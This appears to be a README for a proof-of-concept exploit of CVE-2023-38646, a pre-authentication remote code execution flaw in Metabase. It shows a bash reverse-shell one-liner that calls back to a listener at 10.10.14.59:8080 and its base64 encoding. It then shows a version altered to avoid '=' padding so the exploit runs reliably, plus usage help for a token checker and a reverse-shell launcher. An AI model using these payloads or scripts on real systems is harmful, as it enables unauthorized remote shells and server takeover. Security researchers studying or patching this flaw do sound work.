
Exploit PoC para CVE-2023-38646, un RCE de pre-autenticación en Metabase. Incluye un generador de payloads de shell inversa con corrección de codificación base64 para una explotación fiable.
El script original proviene de securezeron
Durante mis pruebas, descubrí que la shell inversa generada por este PoC fallaba en la explotación tras la codificación base6 debido al carácter '=' al final. Lo modifiqué ligeramente para resolver este problema.
#原始的生成reverse shell负载的代码
>>> base64.b64encode("bash -i >&/dev/tcp/10.10.14.59/8080 0>&1".encode()).decode()
'YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjU5LzgwODAgMD4mMQ=='
#修改后的生成reverse shell负载的代码没有‘=’
>>> base64.b64encode("bash -i > &/dev/tcp/10.10.14.59/8080 0>&1 ".encode()).decode()
'YmFzaCAtaSA+ICYvZGV2L3RjcC8xMC4xMC4xNC41OS84MDgwIDA+JjEg'
└─# python CVE-2023-38646-POC.py -h
usage: CVE-2023-38646-POC.py [-h] [--ip IP] [--list LIST]
Check setup token
options:
-h, --help show this help message and exit
--ip IP IP address
--list LIST Filename containing list of IP addresses
└─# python CVE-2023-38646-Reverse-Shell.py -h
usage: CVE-2023-38646-Reverse-Shell.py [-h] [--rhost RHOST] [--lhost LHOST] [--lport LPORT]
Check setup token
options:
-h, --help show this help message and exit
--rhost RHOST Metabase server IP address (including http:// or https:// and port number if needed)
--lhost LHOST Listener IP address
--lport LPORT Listener port (default is 4444)
Para obtener más información sobre la vulnerabilidad, consulte https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/